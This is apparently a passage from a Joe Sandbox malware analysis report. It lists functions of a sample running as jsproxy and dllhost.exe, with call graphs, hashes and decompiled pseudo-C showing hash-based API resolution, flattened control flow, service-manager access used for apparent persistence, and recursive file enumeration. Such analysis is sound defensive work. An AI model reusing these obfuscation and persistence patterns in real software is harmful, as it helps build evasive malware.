                                                                                • Opcode ID: 5b171dbf3455033e950fbfa492bdb63242653b883d9b301282758081b89dea95
                                                                                • Instruction ID: 754d77ea9a6d71d4753036f48364b96d296da94dc2ede6bca522c4cc669fdf41
                                                                                • Opcode Fuzzy Hash: 5b171dbf3455033e950fbfa492bdb63242653b883d9b301282758081b89dea95
                                                                                • Instruction Fuzzy Hash: B1819E70A283018FDB18DF68D84462BB7E5EB96744F00092DF58AC7291EF74DD158F52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 290580-2905be call 290ed0 606 2905c0-2905cf 603->606 607 2905d2-2905da 603->607 608 2905e0-2905e3 607->608 609 2906e7-2906ef 607->609 608->609 610 2905e9-2905eb 608->610 610->609 611 2905f1-2905fc 610->611 611->609 613 290602-290607 611->613 614 2906d8-2906e4 613->614 615 29060d-290629 call 291140 RtlMoveMemory 613->615 618 29062b-290630 615->618 619 290654-290659 615->619 620 290643-290652 618->620 621 290632-290641 618->621 622 29065b-29066a 619->622 623 29066c-290678 619->623 624 290679-290699 call 291140 620->624 621->624 622->624 623->624 624->609 627 29069b-2906a3 VirtualProtect 624->627 628 2906a5-2906a8 627->628 629 2906c6-2906d5 627->629 628->609 630 2906aa-2906ad 628->630 630->609 631 2906af-2906b1 630->631 631->615 632 2906b7-2906c3 631->632
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0029061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0029069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: a69c49993e132326122a1f774ea24a554d4b1c486d9f4a97481f3ba59b2f58b4
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 3D315AB367430A5BEB249A65DCC5BFBA3D8DBD1354F08043AF909C2290D62FD4B4C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 633 2a5ce0-2a5cec call 2a65e0 636 2a5d09-2a5d0d ExitProcess 633->636 637 2a5cee-2a5d04 call 2a3f00 call 2a3e60 633->637 637->636
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E002A65E0();
				if( *0x2addb8 == 0) {
					 *0x2addb8 = E002A3E60(_t5, E002A3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x002a5ce0
                                                                                0x002a5cec
                                                                                0x002a5d04
                                                                                0x002a5d04
                                                                                0x002a5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 002A5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 8c684f9df9c0993833c1e6cefdcacc7f21a822c44ed7f8945126c37afdf772a6
                                                                                • Instruction ID: fdbcfa52bb5a5a7dd2ce81898b98e10e066167c7a5c4f2020106b986dad8522c
                                                                                • Opcode Fuzzy Hash: 8c684f9df9c0993833c1e6cefdcacc7f21a822c44ed7f8945126c37afdf772a6
                                                                                • Instruction Fuzzy Hash: ECD0C96172461547DB44ABB5684976A269A4FA2748F104019F112CB696FE208D20AB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 642 290ad0-290b31 call 290ed0 645 290b33-290b42 642->645 646 290b47-290b4d 642->646 647 290d40 645->647 648 290b5f-290b7b 646->648 649 290b4f-290b54 646->649 651 290b7d-290b8e 648->651 652 290b90 648->652 649->648 653 290b96-290b9c 651->653 652->653 655 290bae-290bca 653->655 656 290b9e-290ba3 653->656 658 290bcc-290bd4 655->658 659 290bd7-290c21 VirtualAlloc 655->659 656->655 658->659 663 290d1a-290d24 659->663 664 290c27-290c2e 659->664 663->647 665 290c30-290c3f 664->665 666 290c44-290c4b 664->666 665->647 667 290c5d-290c79 666->667 668 290c4d-290c52 666->668 670 290c7b-290c83 667->670 671 290c86-290c8d 667->671 668->667 670->671 672 290c9f-290cbb 671->672 673 290c8f-290c94 671->673 675 290cc8-290cfa VirtualAlloc 672->675 676 290cbd-290cc5 672->676 673->672 679 290d02-290d07 675->679 676->675 679->663 680 290d09-290d18 679->680 680->647
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00290BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 4321f6d9c682fcdf21d2e7bafdfd2cd57da223c468b21556970a8fc743171e49
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 34510170A50218AFDB248F54CE86FEAB7B8EF54B01F004095FA08B7190D6B89D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002902F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: 68086e4e3c97a80a1c88be63500ed404a1020e27710f247e688696b98ec5719a
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 895136B191026DAFDF20DF64DD88BDEB778EF88700F004599E609B7250DB746A858FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00290010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 34c029d72720cc7f6f06126075ba7e34b983191afe3636a707896162755dafb5
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: BD311A38E5112C9BCB04DB98CD80AED7BB5FF4C340B508026D506736A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002906F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: 72f3180afffbd22a35795a45432937cb0e49314531f45cafe6918c1da7ea8691
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 405196B2B243065FDB10DF26C881B6BB3D8AFD47A4F04092DF948E7241E235D9358B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002908F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305527112.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_290000_jsproxy.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 5bc0ae2866c071881f10646e9a5a48bdad0640dfd589b27f671be11290a6994b
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: DC412AB163430A5FDB14DE2ACC85BABB2D9AFC4B50F08493EF644D6240D671D52887E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: dllhost.exe PID: 2484 Parent PID: 2552 dllhost.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00470400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00470448
                                                                                  • Part of subcall function 00471140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00470EFD,00000000), ref: 00471155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00470463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00470484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0047048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00470492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0047049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 004704A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 004704B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 004704E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 004704F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00470519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00470530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00470547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00470562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 7f90accf13b2174a6f387d2e236f3b43a8f55ccfe79a1dc7b8b3570cf200b9de
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 374142B19143406ED610EB7AC845FABB3EDEB88744F40CD1EB6489B251D678D9048BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00488970, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 228 488970-48898d 229 488991-488996 228->229 230 48899c 229->230 231 488aa6-488aab 229->231 232 488a7d-488a8d 230->232 233 4889a2-4889a7 230->233 234 488ab1-488ab6 231->234 235 488b43-488b4a 231->235 236 488a99-488aa1 232->236 237 488a8f 232->237 238 488a08-488a0d 233->238 239 4889a9 233->239 240 488ab8-488abd 234->240 241 488aea-488af1 234->241 242 488b4c-488b62 call 483f00 call 483e60 235->242 243 488b67 235->243 236->229 244 488a90-488a97 237->244 245 488ad2-488ad7 238->245 246 488a13-488a27 call 4834c0 238->246 247 4889c8-4889cf 239->247 248 4889ab-4889b0 239->248 240->245 249 488abf-488ac3 call 485040 240->249 251 488b0e-488b2e 241->251 252 488af3-488b09 call 483f00 call 483e60 241->252 242->243 262 488b6a-488b6f 243->262 244->236 244->244 245->229 258 488add-488ae9 245->258 277 488a29-488a41 call 483f00 call 483e60 246->277 278 488a47-488a78 call 483460 246->278 259 4889ec-4889fb OpenSCManagerW 247->259 260 4889d1-4889e7 call 483f00 call 483e60 247->260 254 488b74-488b7b 248->254 255 4889b6-4889bb 248->255 270 488ac8-488acd 249->270 251->262 276 488b30-488b3e 251->276 252->251 263 488b98 254->263 264 488b7d-488b93 call 483f00 call 483e60 254->264 255->245 269 4889c1-4889c6 255->269 265 488b9b-488ba7 259->265 266 488a01-488a06 259->266 260->259 262->229 263->265 264->263 266->229 269->229 270->229 276->229 277->278 278->229
                                                                                C-Code - Quality: 72%
                                                                                			E00488970() {
				char _v520;
				void* _v524;
				void* _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t15;
				void* _t20;
				void* _t29;
				intOrPtr* _t33;
				void* _t36;
				intOrPtr _t42;
				intOrPtr* _t54;
				void* _t59;
				void* _t60;
				void* _t61;
				intOrPtr _t62;
				short* _t63;
				void* _t64;
				void** _t65;
				void* _t67;
				void* _t68;

				_t65 =  &_v524;
				_t59 = 0;
				_t11 = 0x7c4f4b3;
				_v524 = 0;
				_t36 = _v524;
				_t64 = _v524;
				_t61 = _v524;
				goto L1;
				do {
					while(1) {
						L1:
						_t67 = _t11 - 0x264c1972;
						if(_t67 > 0) {
							break;
						}
						if(_t67 == 0) {
							_t62 =  *0x48e54c; // 0x50dff0
							_t63 = _t62 + 0x260;
							while( *_t63 != 0x5c) {
								_t63 = _t63 + 2;
							}
							_t61 = _t63 + 2;
							_t11 = 0x1548988d;
							continue;
						} else {
							_t68 = _t11 - 0x1548988d;
							if(_t68 > 0) {
								if(_t11 != 0x1d74b649) {
									goto L24;
								} else {
									_t20 = E004834C0(0x48d940);
									_t54 =  *0x48e158;
									_t60 = _t20;
									if(_t54 == 0) {
										_t54 = E00483E60(_t36, E00483F00(0xc6fbcd74), 0xba71dd03, _t64);
										 *0x48e158 = _t54;
									}
									_t42 =  *0x48e54c; // 0x50dff0
									_t5 = _t42 + 0x260; // 0x50e250
									_t6 = _t42 + 0x18; // 0x50e008
									 *_t54( &_v520, 0x104, _t60, _t6, _t5);
									_t65 =  &(_t65[5]);
									E00483460(_t60);
									_t59 = _v524;
									_t11 = 0x264c1972;
									continue;
								}
							} else {
								if(_t68 == 0) {
									if( *0x48e310 == 0) {
										 *0x48e310 = E00483E60(_t36, E00483F00(0x26f5757c), 0x9ba7cd1, _t64);
									}
									_t29 = OpenSCManagerW(0, 0, 0xf003f); // executed
									_t36 = _t29;
									if(_t36 == 0) {
										goto L37;
									} else {
										_t11 = 0x308961ad;
										continue;
									}
								} else {
									if(_t11 == 0x45d0fe6) {
										_t33 =  *0x48e18c;
										if(_t33 == 0) {
											_t33 = E00483E60(_t36, E00483F00(0x26f5757c), 0x268fe5f0, _t64);
											 *0x48e18c = _t33;
										}
										 *_t33(_t36);
										L37:
										return _t59;
									} else {
										if(_t11 != 0x7c4f4b3) {
											goto L24;
										} else {
											_t11 = 0x1d74b649;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					if(_t11 == 0x2f0a6372) {
						_t12 =  *0x48e18c;
						if(_t12 == 0) {
							_t12 = E00483E60(_t36, E00483F00(0x26f5757c), 0x268fe5f0, _t64);
							 *0x48e18c = _t12;
						}
						 *_t12(_t64);
						goto L33;
					} else {
						if(_t11 == 0x308961ad) {
							_t15 =  *0x48e404;
							if(_t15 == 0) {
								_t15 = E00483E60(_t36, E00483F00(0x26f5757c), 0xb4a05b4b, _t64);
								 *0x48e404 = _t15;
							}
							_t64 =  *_t15(_t36, _t61, _t61, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t64 == 0) {
								L33:
								_t11 = 0x45d0fe6;
							} else {
								_t59 = 1;
								_t11 = 0x3740ac4f;
								_v576 = 1;
							}
							goto L1;
						} else {
							if(_t11 != 0x3740ac4f) {
								goto L24;
							} else {
								E00485040(_t36, _t64);
								_t11 = 0x2f0a6372;
								goto L1;
							}
						}
					}
					goto L38;
					L24:
				} while (_t11 != 0xb646886);
				return _t59;
				goto L38;
			}


























                                                                                0x00488970
                                                                                0x0048897a
                                                                                0x0048897c
                                                                                0x00488981
                                                                                0x00488985
                                                                                0x00488989
                                                                                0x0048898d
                                                                                0x0048898d
                                                                                0x00488991
                                                                                0x00488991
                                                                                0x00488991
                                                                                0x00488991
                                                                                0x00488996
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0048899c
                                                                                0x00488a7d
                                                                                0x00488a83
                                                                                0x00488a8d
                                                                                0x00488a90
                                                                                0x00488a93
                                                                                0x00488a99
                                                                                0x00488a9c
                                                                                0x00000000
                                                                                0x004889a2
                                                                                0x004889a2
                                                                                0x004889a7
                                                                                0x00488a0d
                                                                                0x00000000
                                                                                0x00488a13
                                                                                0x00488a18
                                                                                0x00488a1d
                                                                                0x00488a23
                                                                                0x00488a27
                                                                                0x00488a3f
                                                                                0x00488a41
                                                                                0x00488a41
                                                                                0x00488a47
                                                                                0x00488a4d
                                                                                0x00488a54
                                                                                0x00488a63
                                                                                0x00488a65
                                                                                0x00488a6a
                                                                                0x00488a6f
                                                                                0x00488a73
                                                                                0x00000000
                                                                                0x00488a73
                                                                                0x004889a9
                                                                                0x004889a9
                                                                                0x004889cf
                                                                                0x004889e7
                                                                                0x004889e7
                                                                                0x004889f5
                                                                                0x004889f7
                                                                                0x004889fb
                                                                                0x00000000
                                                                                0x00488a01
                                                                                0x00488a01
                                                                                0x00000000
                                                                                0x00488a01
                                                                                0x004889ab
                                                                                0x004889b0
                                                                                0x00488b74
                                                                                0x00488b7b
                                                                                0x00488b8e
                                                                                0x00488b93
                                                                                0x00488b93
                                                                                0x00488b99
                                                                                0x00488b9b
                                                                                0x00488ba7
                                                                                0x004889b6
                                                                                0x004889bb
                                                                                0x00000000
                                                                                0x004889c1
                                                                                0x004889c1
                                                                                0x00000000
                                                                                0x004889c1
                                                                                0x004889bb
                                                                                0x004889b0
                                                                                0x004889a9
                                                                                0x004889a7
                                                                                0x00000000
                                                                                0x0048899c
                                                                                0x00488aab
                                                                                0x00488b43
                                                                                0x00488b4a
                                                                                0x00488b5d
                                                                                0x00488b62
                                                                                0x00488b62
                                                                                0x00488b68
                                                                                0x00000000
                                                                                0x00488ab1
                                                                                0x00488ab6
                                                                                0x00488aea
                                                                                0x00488af1
                                                                                0x00488b04
                                                                                0x00488b09
                                                                                0x00488b09
                                                                                0x00488b2a
                                                                                0x00488b2e
                                                                                0x00488b6a
                                                                                0x00488b6a
                                                                                0x00488b30
                                                                                0x00488b30
                                                                                0x00488b35
                                                                                0x00488b3a
                                                                                0x00488b3a
                                                                                0x00000000
                                                                                0x00488ab8
                                                                                0x00488abd
                                                                                0x00000000
                                                                                0x00488abf
                                                                                0x00488ac3
                                                                                0x00488ac8
                                                                                0x00000000
                                                                                0x00488ac8
                                                                                0x00488abd
                                                                                0x00488ab6
                                                                                0x00000000
                                                                                0x00488ad2
                                                                                0x00488ad2
                                                                                0x00488ae9
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004889F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID: rc/$rc/
                                                                                • API String ID: 1889721586-3664441713
                                                                                • Opcode ID: 50383b9c32e25c1689da40950db978b1d62b4b10fcc51b18346535d5537f7b7c
                                                                                • Instruction ID: 861a8f7d2d870289a6e3fb7fd94ef63aaac06078862820c339b27c7a39091f8a
                                                                                • Opcode Fuzzy Hash: 50383b9c32e25c1689da40950db978b1d62b4b10fcc51b18346535d5537f7b7c
                                                                                • Instruction Fuzzy Hash: FF51B4B1B0420157DA24BB6A9C95B3F3295ABD0718F544C2FF645CB382EE7CDC05879A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004838F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 441 4838f0-48390b 442 483910-483915 441->442 443 483a69-483a6e 442->443 444 48391b 442->444 447 483acc-483adf call 4834c0 443->447 448 483a70-483a75 443->448 445 483a5f-483a64 444->445 446 483921-483926 444->446 445->442 451 48392c-483931 446->451 452 483a17-483a1e 446->452 469 483afc-483b17 447->469 470 483ae1-483af7 call 483f00 call 483e60 447->470 449 483ab6-483abb 448->449 450 483a77-483a7e 448->450 449->442 458 483ac1-483acb 449->458 454 483a9b-483ab1 450->454 455 483a80-483a96 call 483f00 call 483e60 450->455 459 483b70-483b77 451->459 460 483937-48393c 451->460 456 483a3b-483a4f FindFirstFileW 452->456 457 483a20-483a36 call 483f00 call 483e60 452->457 454->442 455->454 466 483a55-483a5a 456->466 467 483b97-483ba1 456->467 457->456 464 483b79-483b8f call 483f00 call 483e60 459->464 465 483b94 459->465 460->449 468 483942-483947 460->468 464->465 465->467 466->442 475 48394d-483953 468->475 476 4839f1-483a12 468->476 490 483b19-483b2f call 483f00 call 483e60 469->490 491 483b34-483b3f 469->491 470->469 483 483974-483976 475->483 484 483955-48395d 475->484 476->442 486 483978-48398b call 4834c0 483->486 487 48396d-483972 483->487 484->487 494 48395f-483963 484->494 503 4839a8-4839ec call 4838f0 call 483460 486->503 504 48398d-4839a3 call 483f00 call 483e60 486->504 487->442 490->491 506 483b5c-483b6b 491->506 507 483b41-483b57 call 483f00 call 483e60 491->507 494->483 495 483965-48396b 494->495 495->483 495->487 503->442 504->503 506->442 507->506
                                                                                C-Code - Quality: 63%
                                                                                			E004838F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x48e430 == 0) {
								 *0x48e430 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x48dba4;
								if(_t42 == 0) {
									_t42 = E00483E60(_t56, E00483F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x48dba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E004834C0(0x48d290);
											_t50 =  *0x48e158;
											if(_t50 == 0) {
												_t50 = E00483E60(_t56, E00483F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x48e158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E004838F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E00483460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E004834C0(0x48d260);
					_t24 =  *0x48e158;
					if(_t24 == 0) {
						_t24 = E00483E60(_t56, E00483F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x48e158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x48e494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x48e494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x48df30;
					if(_t28 == 0) {
						_t28 = E00483E60(_t56, E00483F00(0x9bab0b12), 0x5010a54d, _t95);
